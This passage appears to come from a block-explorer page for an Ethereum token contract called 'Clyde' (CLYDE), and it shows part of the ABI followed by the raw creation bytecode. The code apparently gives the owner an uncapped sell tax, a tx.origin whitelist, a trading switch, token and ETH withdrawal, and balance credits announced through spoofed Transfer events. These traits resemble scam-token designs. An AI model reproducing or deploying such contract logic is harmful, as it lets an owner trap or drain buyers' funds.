Type":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buytax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"changeMe","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"exclusive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getChainID","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getOpenedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"listRouter","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minBuyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"selltax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_exclusive","type":"address"}],"name":"setExclusive","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"},{"internalType":"uint256","name":"_st","type":"uint256"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenName","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenSymbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"univ2","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdrawETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawStuckToken","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526040518060400160405280600581526020017f436c79646500000000000000000000000000000000000000000000000000000081525060089081610048919061141d565b506040518060400160405280600581526020017f434c5944450000000000000000000000000000000000000000000000000000008152506009908161008d919061141d565b50737a250d5630b4cf539739df2c5dacb4c659f2488d60155f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506b015b6a759f4835dc24000000601655730f78b8eabebad24f26cbd8af0660cd49c22de71860175f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073261676b805d80540523c7f13835a49c681aa67d660185f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156101a5575f5ffd5b5033600880546101b490611244565b80601f01602080910402602001604051908101604052809291908181526020018280546101e090611244565b801561022b5780601f106102025761010080835404028352916020019161022b565b820191905f5260205f20905b81548152906001019060200180831161020e57829003601f168201915b50505050506009805461023d90611244565b80601f016020809104026020016040519081016040528092919081815260200182805461026990611244565b80156102b45780601f1061028b576101008083540402835291602001916102b4565b820191905f5260205f20905b81548152906001019060200180831161029757829003601f168201915b5050505050333360165484600390816102cd919061141d565b5083600490816102dd919061141d565b508260055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060028190555050505050505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036103da575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016103d1919061152b565b60405180910390fd5b6103e98161055960201b60201c565b50600160135f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160115f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506104be336064605a6016546104a99190611571565b6104b391906115df565b61061c60201b60201c565b61050960185f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16606460056016546104f49190611571565b6104fe91906115df565b61061c60201b60201c565b61055460175f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166064600560165461053f9190611571565b61054991906115df565b61061c60201b60201c565b6118b6565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361068c575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610683919061152b565b60405180910390fd5b61069d5f83836106a160201b60201c565b5050565b60135f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561070657610701838383610a7760201b60201c565b610a72565b600d5f9054906101000a900460ff16610754576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074b90611669565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036107be576107b9838383610a7760201b60201c565b610a72565b60115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615801561085c575060115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610a605760145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610960575f61091560646040518060400160405280600381526020017f4e6f210000000000000000000000000000000000000000000000000000000000815250610906600a5486610e5060201b90919060201c565b610ec760201b9092919060201c565b905061092a8183610f2860201b90919060201c565b91505f82036109395750610a72565b6109498482610f7760201b60201c565b61095a848484610a7760201b60201c565b50610a72565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a5f575f610a1460646040518060400160405280600381526020017f4e6f210000000000000000000000000000000000000000000000000000000000815250610a05600b5486610e5060201b90919060201c565b610ec760201b9092919060201c565b9050610a298183610f2860201b90919060201c565b91505f8203610a385750610a72565b610a488482610f7760201b60201c565b610a59848484610a7760201b60201c565b50610a72565b5b610a71838383610a7760201b60201c565b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ac7578060025f828254610abb9190611687565b92505081905550610b95565b5f5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610b50578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610b47939291906116c9565b60405180910390fd5b8181035f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bdc578060025f8282540392505081905550610c26565b805f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d055760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cf891906116fe565b60405180910390a3610e4b565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610de4578173ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610dd791906116fe565b60405180910390a3610e4a565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e4191906116fe565b60405180910390a35b5b505050565b5f5f8303610e60575f9050610ec1565b5f8284610e6d9190611571565b9050828482610e7c91906115df565b14610ebc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eb390611787565b60405180910390fd5b809150505b92915050565b5f5f83118290610f0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0491906117fb565b60405180910390fd5b505f8385610f1b91906115df565b9050809150509392505050565b5f610f6f83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061112160201b60201c565b905092915050565b5f81031561111d57610fe881604051806060016040528060268152602001614512602691395f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461112160201b9092919060201c565b5f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611077815f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461118360201b90919060201c565b5f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161111491906116fe565b60405180910390a35b5050565b5f838311158290611168576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161115f91906117fb565b60405180910390fd5b505f8385611176919061181b565b9050809150509392505050565b5f5f82846111919190611687565b9050838110156111d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111cd90611898565b60405180910390fd5b8091505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061125b57607f821691505b60208210810361126e5761126d611217565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026112d07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82611295565b6112da8683611295565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61131e611319611314846112f2565b6112fb565b6112f2565b9050919050565b5f819050919050565b61133783611304565b61134b61134382611325565b8484546112a1565b825550505050565b5f5f905090565b611362611353565b61136d81848461132e565b505050565b5b81811015611390576113855f8261135a565b600181019050611373565b5050565b601f8211156113d5576113a681611274565b6113af84611286565b810160208510156113be578190505b6113d26113ca85611286565b830182611372565b50505b505050565b5f82821c905092915050565b5f6113f55f19846008026113da565b1980831691505092915050565b5f61140d83836113e6565b9150826002028217905092915050565b611426826111e0565b67ffffffffffffffff81111561143f5761143e6111ea565b5b6114498254611244565b611454828285611394565b5f60209050601f831160018114611485575f8415611473578287015190505b61147d8582611402565b8655506114e4565b601f19841661149386611274565b5f5b828110156114ba57848901518255600182019150602085019450602081019050611495565b868310156114d757848901516114d3601f8916826113e6565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611515826114ec565b9050919050565b6115258161150b565b82525050565b5f60208201905061153e5f83018461151c565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61157b826112f2565b9150611586836112f2565b9250828202611594816112f2565b915082820484148315176115ab576115aa611544565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6115e9826112f2565b91506115f4836112f2565b925082611604576116036115b2565b5b828204905092915050565b5f82825260208201905092915050565b7f547261646520686173206e6f74206265656e206f70656e6564207965740000005f82015250565b5f611653601d8361160f565b915061165e8261161f565b602082019050919050565b5f6020820190508181035f83015261168081611647565b9050919050565b5f611691826112f2565b915061169c836112f2565b92508282019050808211156116b4576116b3611544565b5b92915050565b6116c3816112f2565b82525050565b5f6060820190506116dc5f83018661151c565b6116e960208301856116ba565b6116f660408301846116ba565b949350505050565b5f6020820190506117115f8301846116ba565b92915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61177160218361160f565b915061177c82611717565b604082019050919050565b5f6020820190508181035f83015261179e81611765565b9050919050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6117cd826111e0565b6117d7818561160f565b93506117e78185602086016117a5565b6117f0816117b3565b840191505092915050565b5f6020820190508181035f83015261181381846117c3565b905092915050565b5f611825826112f2565b9150611830836112f2565b925082820390508181111561184857611847611544565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f611882601b8361160f565b915061188d8261184e565b602082019050919050565b5f6020820190508181035f8301526118af81611876565b9050919050565b612c4f806118c35f395ff3fe608060405234801561000f575f5ffd5b506004361061023b575f3560e01c80636c02a931116101395780639baac8b3116100b6578063dd62ed3e1161007a578063dd62ed3e1461066f578063e086e5ec1461069f578063f2fde38b146106a9578063f66bf229146106c5578063fdf2fe64146106e35761023b565b80639baac8b3146105cb578063a2dfb668146105e7578063a9059cbb14610605578063ceb82ddc14610635578063d56b6de21461063f5761023b565b80637298d36e116100fd5780637298d36e146105355780637b61c3201461055357806388e765ff146105715780638da5cb5b1461058f57806395d89b41146105ad5761023b565b80636c02a931146104a5578063706f6937146104c357806370a08231146104df578063715018a61461050f57806372098f68146105195761023b565b8063313ce567116101c75780634a1263f31161018b5780634a1263f3146103fd5780635408d42d1461041b578063564b81ef14610439578063593ed58c14610457578063694c3fa1146104875761023b565b8063313ce5671461036b5780633736421b146103895780633811ac02146103a75780633c9f5ed6146103c35780633fe32037146103e15761023b565b806316ab369a1161020e57806316ab369a146102b357806318160ddd146102e357806323b872dd146103015780632711b8a514610331578063274d9afc1461034f5761023b565b8063068acf6c1461023f57806306fdde031461025b578063095ea7b3146102795780630bd05b69146102a9575b5f5ffd5b610259600480360381019061025491906121b5565b6106ed565b005b6102636107f0565b6040516102709190612250565b60405180910390f35b610293600480360381019061028e91906122a3565b610880565b6040516102a091906122fb565b60405180910390f35b6102b16108a2565b005b6102cd60048036038101906102c891906121b5565b6108d4565b6040516102da91906122fb565b60405180910390f35b6102eb6108f1565b6040516102f89190612323565b60405180910390f35b61031b6004803603810190610316919061233c565b6108fa565b60405161032891906122fb565b60405180910390f35b610339610928565b6040516103469190612323565b60405180910390f35b610369600480360381019061036491906121b5565b610930565b005b610373610990565b60405161038091906123a7565b60405180910390f35b610391610998565b60405161039e91906123cf565b60405180910390f35b6103c160048036038101906103bc9190612528565b6109bd565b005b6103cb610a53565b6040516103d891906122fb565b60405180910390f35b6103fb60048036038101906103f691906122a3565b610a68565b005b610405610abb565b6040516104129190612323565b60405180910390f35b610423610ac1565b60405161043091906122fb565b60405180910390f35b610441610ad3565b60405161044e9190612323565b60405180910390f35b610471600480360381019061046c919061256f565b610adf565b60405161047e91906123cf565b60405180910390f35b61048f610b0f565b60405161049c9190612323565b60405180910390f35b6104ad610b15565b6040516104ba9190612250565b60405180910390f35b6104dd60048036038101906104d8919061265a565b610ba1565b005b6104f960048036038101906104f491906121b5565b610cef565b6040516105069190612323565b60405180910390f35b610517610d34565b005b610533600480360381019061052e919061256f565b610d47565b005b61053d610d59565b60405161054a919061272b565b60405180910390f35b61055b610d7e565b6040516105689190612250565b60405180910390f35b610579610e0a565b6040516105869190612323565b60405180910390f35b610597610e10565b6040516105a491906123cf565b60405180910390f35b6105b5610e38565b6040516105c29190612250565b60405180910390f35b6105e560048036038101906105e0919061256f565b610ec8565b005b6105ef610eda565b6040516105fc9190612323565b60405180910390f35b61061f600480360381019061061a91906122a3565b610ee0565b60405161062c91906122fb565b60405180910390f35b61063d610f02565b005b610659600480360381019061065491906121b5565b610f89565b60405161066691906122fb565b60405180910390f35b61068960048036038101906106849190612744565b610fa6565b6040516106969190612323565b60405180910390f35b6106a7611028565b005b6106c360048036038101906106be91906121b5565b611076565b005b6106cd6110fa565b6040516106da9190612323565b60405180910390f35b6106eb611100565b005b6106f5611187565b5f8173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161072f91906123cf565b602060405180830381865afa15801561074a573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061076e9190612796565b90508173ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33836040518363ffffffff1660e01b81526004016107ab9291906127c1565b6020604051808303815f875af11580156107c7573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107eb9190612812565b505050565b6060600380546107ff9061286a565b80601f016020809104026020016040519081016040528092919081815260200182805461082b9061286a565b80156108765780601f1061084d57610100808354040283529160200191610876565b820191905f5260205f20905b81548152906001019060200180831161085957829003601f168201915b5050505050905090565b5f5f61088a61120e565b9050610897818585611215565b600191505092915050565b6108aa611187565b600d5f9054906101000a900460ff1615600d5f6101000a81548160ff021916908315150217905550565b6013602052805f5260405f205f915054906101000a900460ff1681565b5f600254905090565b5f5f61090461120e565b9050610911858285611227565b61091c8585856112b9565b60019150509392505050565b5f6001905090565b610938611187565b600160115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b5f6012905090565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6109c5611187565b5f5f90505b8151811015610a4f57600160135f8484815181106109eb576109ea61289a565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806001019150506109ca565b5050565b5f600d5f9054906101000a900460ff16905090565b610a70611187565b8160145f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600b819055505050565b600a5481565b600d5f9054906101000a900460ff1681565b5f5f4690508091505090565b6012602052805f5260405f205f915054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b5481565b60088054610b229061286a565b80601f0160208091040260200160405190810160405280929190818152602001828054610b4e9061286a565b8015610b995780601f10610b7057610100808354040283529160200191610b99565b820191905f5260205f20905b815481529060010190602001808311610b7c57829003601f168201915b505050505081565b610ba9611187565b5f5f90505b8251811015610cea57818181518110610bca57610bc961289a565b5b60200260200101515f5f858481518110610be757610be661289a565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610c3691906128f4565b92505081905550828181518110610c5057610c4f61289a565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff16610c76610e10565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef848481518110610cc057610cbf61289a565b5b6020026020010151604051610cd59190612323565b60405180910390a38080600101915050610bae565b505050565b5f5f5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610d3c611187565b610d455f6113a9565b565b610d4f611187565b80600e8190555050565b60155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60098054610d8b9061286a565b80601f0160208091040260200160405190810160405280929190818152602001828054610db79061286a565b8015610e025780601f10610dd957610100808354040283529160200191610e02565b820191905f5260205f20905b815481529060010190602001808311610de557829003601f168201915b505050505081565b600f5481565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610e479061286a565b80601f0160208091040260200160405190810160405280929190818152602001828054610e739061286a565b8015610ebe5780601f10610e9557610100808354040283529160200191610ebe565b820191905f5260205f20905b815481529060010190602001808311610ea157829003601f168201915b5050505050905090565b610ed0611187565b80600f8190555050565b60105481565b5f5f610eea61120e565b9050610ef78185856112b9565b600191505092915050565b3373ffffffffffffffffffffffffffffffffffffffff16610f21610e10565b73ffffffffffffffffffffffffffffffffffffffff1614610f77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6e90612971565b60405180910390fd5b68056bc75e2d63100000601081905550565b6011602052805f5260405f205f915054906101000a900460ff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b611030611187565b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015611073573d5f5f3e3d5ffd5b50565b61107e611187565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036110ee575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016110e591906123cf565b60405180910390fd5b6110f7816113a9565b50565b600e5481565b3373ffffffffffffffffffffffffffffffffffffffff1661111f610e10565b73ffffffffffffffffffffffffffffffffffffffff1614611175576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116c90612971565b60405180910390fd5b68056bc75e2d63100000601081905550565b61118f61120e565b73ffffffffffffffffffffffffffffffffffffffff166111ad610e10565b73ffffffffffffffffffffffffffffffffffffffff161461120c576111d061120e565b6040517f118cdaa700000000000000000000000000000000000000000000000000000000815260040161120391906123cf565b60405180910390fd5b565b5f33905090565b611222838383600161146c565b505050565b5f6112328484610fa6565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146112b357818110156112a4578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161129b9392919061298f565b60405180910390fd5b6112b284848484035f61146c565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611329575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161132091906123cf565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611399575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161139091906123cf565b60405180910390fd5b6113a483838361163b565b505050565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036114dc575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016114d391906123cf565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361154c575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161154391906123cf565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015611635578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161162c9190612323565b60405180910390a35b50505050565b60135f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561169a576116958383836119e7565b6119e2565b600d5f9054906101000a900460ff166116e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116df90612a0e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361174c576117478383836119e7565b6119e2565b60115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156117ea575060115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156119d65760145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118e2575f6118a360646040518060400160405280600381526020017f4e6f210000000000000000000000000000000000000000000000000000000000815250611894600a5486611dc090919063ffffffff16565b611e379092919063ffffffff16565b90506118b88183611e9890919063ffffffff16565b91505f82036118c757506119e2565b6118d18482611ee1565b6118dc8484846119e7565b506119e2565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119d5575f61199660646040518060400160405280600381526020017f4e6f210000000000000000000000000000000000000000000000000000000000815250611987600b5486611dc090919063ffffffff16565b611e379092919063ffffffff16565b90506119ab8183611e9890919063ffffffff16565b91505f82036119ba57506119e2565b6119c48482611ee1565b6119cf8484846119e7565b506119e2565b5b6119e18383836119e7565b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a37578060025f828254611a2b91906128f4565b92505081905550611b05565b5f5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611ac0578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401611ab79392919061298f565b60405180910390fd5b8181035f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b4c578060025f8282540392505081905550611b96565b805f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c755760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611c689190612323565b60405180910390a3611dbb565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d54578173ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611d479190612323565b60405180910390a3611dba565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55